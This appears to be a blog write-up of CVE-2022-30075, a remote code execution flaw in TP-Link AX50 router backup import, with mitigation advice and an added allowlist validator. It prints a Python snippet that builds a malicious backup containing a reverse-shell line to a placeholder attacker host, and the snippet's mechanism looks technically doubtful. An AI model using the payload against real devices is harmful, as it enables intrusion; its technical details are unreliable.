In this blog post, we will be discussing a recently discovered vulnerability that has been identified as CVE-2022-30075, which affects TP-Link Router AX50 firmware 210730 and older. This vulnerability can lead to remote code execution (RCE) due to improper validation when importing a malicious backup file via the web interface. This could potentially allow an attacker to gain full control over the targeted device and access sensitive information.

Vulnerability Details

CVE-ID: CVE-2022-30075
Affected Product: TP-Link Router AX50
Affected Firmware Version: Firmware 210730 and older
Severity: Critical
Vulnerability Type: Remote Code Execution (RCE)

Vulnerability Description

The vulnerability exists in the backup import functionality of TP-Link Router AX50 firmware 210730 and older, where improper validation of the imported file is performed. An attacker with access to the web interface of the router can upload a maliciously crafted backup file, ultimately leading to remote code execution on the router.

The following code snippet demonstrates how the attacker may create a malicious backup file:

import tarfile
import json

malicious_config = {
    "system": {
        "hostname": "TPLINK",
        "timezone": "GMT",
        "username": "admin",
        "password": "encoded_password",
        "shell": "/bin/sh -i >& /dev/tcp/attacker_ip/attacker_port >&1"
    }
}

with open("config.json", "w") as f:
    json.dump(malicious_config, f)

with tarfile.open("malicious_backup.tar", "w") as tar:
    tar.add("config.json")

The attacker can now import this malicious backup file (malicious_backup.tar) via the web interface of the victim TP-Link Router AX50.

A detailed proof-of-concept of this exploit can be found in the following GitHub repository:

- TP-Link Router AX50 Firmware 210730 RCE

Mitigation

TP-Link has acknowledged the vulnerability and has released a firmware update for the Router AX50, which resolves this issue. Users are advised to download and install the latest firmware to protect their devices. To download the firmware update, visit the TP-Link Router AX50 Support Page.
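Added example (not from the original post and not TP-Link's code): a sketch of the kind of import-side validation whose absence the post describes, applied to the illustrative config.json-in-tar layout of the snippet above. The allowlisted keys, value patterns and size limit are assumptions; the real backup format is not described on this page.

```python
import io
import json
import re
import tarfile

# Assumed schema: keys and value patterns are illustrative, modelled on the
# sample config.json shown earlier, not on TP-Link's real backup format.
ALLOWED = {
    "system": {
        "hostname": re.compile(r"[A-Za-z0-9-]{1,63}"),
        "timezone": re.compile(r"[A-Za-z0-9/_+-]{1,32}"),
        "username": re.compile(r"[A-Za-z0-9_.-]{1,32}"),
        "password": re.compile(r"[A-Za-z0-9+/=_]{1,128}"),
    }
}
MAX_CONFIG_BYTES = 64 * 1024  # assumed upper bound for a config file
ARCHIVE_RULE = "archive must contain only a regular file named config.json"


def validate_backup(blob):
    """Return a list of reasons to reject the backup; an empty list means accept."""
    try:
        with tarfile.open(fileobj=io.BytesIO(blob), mode="r:") as tar:
            members = tar.getmembers()
            # Exactly one regular file with a fixed name: no links, devices or paths.
            if len(members) != 1:
                return [ARCHIVE_RULE]
            member = members[0]
            if member.name != "config.json" or not member.isfile():
                return [ARCHIVE_RULE]
            if member.size > MAX_CONFIG_BYTES:
                return ["config.json too large"]
            config = json.loads(tar.extractfile(member).read())
    except (tarfile.TarError, ValueError) as exc:
        return [f"unreadable backup: {exc}"]
    if not isinstance(config, dict):
        return ["top-level JSON value must be an object"]
    problems = []
    for section, fields in config.items():
        schema = ALLOWED.get(section)
        if schema is None or not isinstance(fields, dict):
            problems.append(f"unexpected section: {section}")
            continue
        for key, value in fields.items():
            pattern = schema.get(key)
            if pattern is None:  # unknown keys are rejected, never passed through
                problems.append(f"unexpected key: {section}.{key}")
            elif not isinstance(value, str) or not pattern.fullmatch(value):
                problems.append(f"invalid value for {section}.{key}")
    return problems
```

The check is an allowlist: a key such as the `shell` entry in the sample above is rejected because it is not in the schema, and values are matched in full against a restrictive pattern rather than scanned for known-bad characters.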

References

- CVE-2022-30075 - NVD
- TP-Link Security Advisory (TL-SA-20220501)

Conclusion

The CVE-2022-30075 vulnerability in TP-Link Router AX50 firmware 210730 and older highlights the importance of keeping your devices up-to-date and applying the latest security patches. By promptly updating your firmware, you can help protect your devices and network from potential threats. Stay vigilant and monitor the release of security updates for your devices to stay one step ahead.

Timeline

Published on: 06/09/2022 04:15:00 UTC
Last modified on: 06/20/2022 19:15:00 UTC